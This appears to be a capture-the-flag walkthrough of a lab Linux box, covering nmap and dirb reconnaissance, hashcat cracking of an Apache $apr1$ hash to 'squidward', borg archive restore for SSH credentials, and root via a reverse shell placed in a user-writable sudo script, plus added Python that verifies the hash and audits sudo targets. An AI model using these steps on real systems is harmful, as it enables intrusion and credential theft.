Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-28 07:42 GMT
Nmap scan report for ip-10-10-190-220.eu-west-1.compute.internal (10.10.190.220)
Host is up (0.00065s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:D2:C4:A7:98:45 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.65 seconds

Directory brute-forcing with dirb turns up /etc/admin.

The etc directory holds a password hash; save it to a file.
Identify the hash type with hash-identifier (it is an Apache $apr1$ MD5 hash, hashcat mode 1600), then run it straight through hashcat:
hashcat -m 1600 1.hash /usr/share/wordlists/rockyou.txt

$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Sun Jan 28 15:56:57 2024 (2 secs)
Time.Estimated...: Sun Jan 28 15:56:59 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 20537 H/s (10.82ms) @ Accel:64 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 39168/14344385 (0.27%)
Rejected.........: 0/39168 (0.00%)
Restore.Point....: 38912/14344385 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: treetree -> lynnlynn
Hardware.Mon.#1..: Util: 91%
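As an added example (my code, not part of the original writeup), the following reimplements the Apache $apr1$ MD5-crypt scheme that hashcat mode 1600 targets, so the cracked result above can be confirmed offline and the htpasswd entry flagged for its weak scheme. The hash and password are the ones from the writeup; the scheme table and the helper names are mine.

```python
"""Added example (not from the original writeup): identify an htpasswd
entry's hash scheme and verify a recovered password against it.

Implements Apache's $apr1$ MD5-crypt variant (apr_md5_encode) so the
crack result can be confirmed without hashcat, and reports whether the
scheme is one a defender should replace (bcrypt is htpasswd's strong option)."""
from __future__ import annotations

import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Prefix -> (description, weak?). Only schemes htpasswd itself emits.
SCHEMES = {
    "$apr1$": ("Apache MD5 (apr1), 1000 MD5 rounds", True),
    "$2y$": ("bcrypt", False),
    "$2a$": ("bcrypt", False),
    "{SHA}": ("SHA-1, unsalted", True),
}


def identify(entry: str) -> tuple[str, bool]:
    """Return (scheme description, is_weak) for one htpasswd hash field.
    A 13-character field with no prefix is traditional DES crypt."""
    for prefix, info in SCHEMES.items():
        if entry.startswith(prefix):
            return info
    if len(entry) == 13:
        return ("traditional DES crypt, 8-char password limit", True)
    return ("unknown", True)


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: least significant 6 bits first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: str, salt: str) -> str:
    """Apache MD5-crypt ($apr1$), following apr_md5_encode() step by step."""
    pw = password.encode()
    salt_b = salt.encode()[:8]          # salt is at most 8 characters
    magic = b"$apr1$"

    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    pl = len(pw)
    while pl > 0:                       # as many bytes of alt as the password has
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                            # one byte per bit of len(pw)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 stretching rounds set the cost. That is cheap by today's standards,
    # which is why a CPU manages ~20 kH/s against it in the hashcat run above.
    for r in range(1000):
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(salt_b)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()

    f = final
    enc = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"$apr1${salt_b.decode()}${enc}"


def verify_apr1(password: str, entry: str) -> bool:
    """Constant-time comparison of a candidate against an $apr1$ entry."""
    _, _, salt, _ = entry.split("$", 3)
    return hmac.compare_digest(apr1_md5(password, salt), entry)


# The entry recovered from the writeup's htpasswd file.
PAGE_ENTRY = "$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn."

if __name__ == "__main__":
    name, weak = identify(PAGE_ENTRY)
    print(f"{PAGE_ENTRY}: {name}{' [WEAK]' if weak else ''}")
    print("squidward matches:", verify_apr1("squidward", PAGE_ENTRY))
```

The practical takeaway for whoever owns that server: regenerate the file with `htpasswd -B` so entries are bcrypt, and the same rockyou run would no longer finish in two seconds.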

The admin page turns out to be a music archive; download it, extract it and take a look.

A quick Baidu search turns up the command to restore it:
borg extract home/field/dev/final_archive::music_archive
After the restore, move into the newly created directory and look around briefly; the password is right there.


After logging in over SSH, sudo -l shows a script that can be run with sudo:

alex@ubuntu:~$ ls -al /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 2020 /etc/mp3backups/backup.sh

The owner is actually alex, so just add write permission, drop a reverse shell into it, and the privilege escalation succeeds.
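The root cause here is a sudo rule whose target script is owned and therefore editable by the very user allowed to run it. As an added example (mine, not from the writeup), this audit reconstructs the file facts from the `ls -al` line above and reports why that target fails the rule every sudo command should meet: owned by root, not writable by the invoker, in a directory the invoker cannot replace files in. The uid/gid 1000 for alex and the comparison paths are constructed.

```python
"""Added example (not from the writeup): audit the ownership and mode of a
script that sudo lets a user run as root.

Rule: a sudo target must be owned by root and be neither writable by the
invoking user (directly or via group/world bits) nor sit in a directory the
invoker can replace files in. uid/gid values below are constructed."""
from __future__ import annotations

import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class FileFacts:
    path: str
    mode: int          # permission bits only, as from stat.S_IMODE
    uid: int
    gid: int


def mode_from_ls(perm: str) -> int:
    """Convert an ls -l permission field such as '-r-xr-xr--' to mode bits."""
    bits = perm[1:10]
    mode = 0
    for i, ch in enumerate(bits):
        if ch in "rwxst":                 # lowercase s/t also imply x
            mode |= 1 << (8 - i)
    if bits[2] in "sS":
        mode |= stat.S_ISUID
    if bits[5] in "sS":
        mode |= stat.S_ISGID
    if bits[8] in "tT":
        mode |= stat.S_ISVTX
    return mode


def audit_sudo_target(target: FileFacts, invoker_uid: int,
                      invoker_gids: set[int],
                      parent: FileFacts | None = None) -> list[str]:
    """Return findings for one sudo target; an empty list means it passes."""
    findings: list[str] = []
    if target.uid != 0:
        findings.append(f"{target.path}: owned by uid {target.uid}, not root")
    if target.uid == invoker_uid:
        findings.append(f"{target.path}: owned by the invoking user, "
                        "who can chmod +w and rewrite what root executes")
    if target.mode & stat.S_IWGRP and target.gid in invoker_gids:
        findings.append(f"{target.path}: group-writable by one of the invoker's groups")
    if target.mode & stat.S_IWOTH:
        findings.append(f"{target.path}: world-writable")
    if parent is not None and not parent.mode & stat.S_ISVTX:
        parent_writable = (
            parent.uid == invoker_uid and parent.mode & stat.S_IWUSR
            or parent.gid in invoker_gids and parent.mode & stat.S_IWGRP
            or parent.mode & stat.S_IWOTH
        )
        if parent_writable:
            findings.append(f"{parent.path}: invoker can replace files in the "
                            "parent directory, so the target can be swapped out")
    return findings


def facts_from_disk(path: str) -> FileFacts:
    """Live variant: read the same facts from the filesystem."""
    st = os.stat(path)
    return FileFacts(path, stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)


# Reconstructed from the writeup's ls -al line; alex assumed to be uid/gid 1000.
PAGE_SCRIPT = FileFacts("/etc/mp3backups/backup.sh", mode_from_ls("-r-xr-xr--"), 1000, 1000)
# What the fixed file should look like: root-owned, 0755, in a root-owned 0755 dir.
FIXED_SCRIPT = FileFacts("/etc/mp3backups/backup.sh", 0o755, 0, 0)
FIXED_PARENT = FileFacts("/etc/mp3backups", 0o755, 0, 0)

if __name__ == "__main__":
    for f in audit_sudo_target(PAGE_SCRIPT, 1000, {1000}, FIXED_PARENT):
        print("FINDING:", f)
    print("fixed:", audit_sudo_target(FIXED_SCRIPT, 1000, {1000}, FIXED_PARENT) or "OK")
```

The fix the audit points at is `chown root:root /etc/mp3backups/backup.sh && chmod 0755 /etc/mp3backups/backup.sh`, and the same checks apply to anything the script itself calls, since sudo's trust extends to them as well.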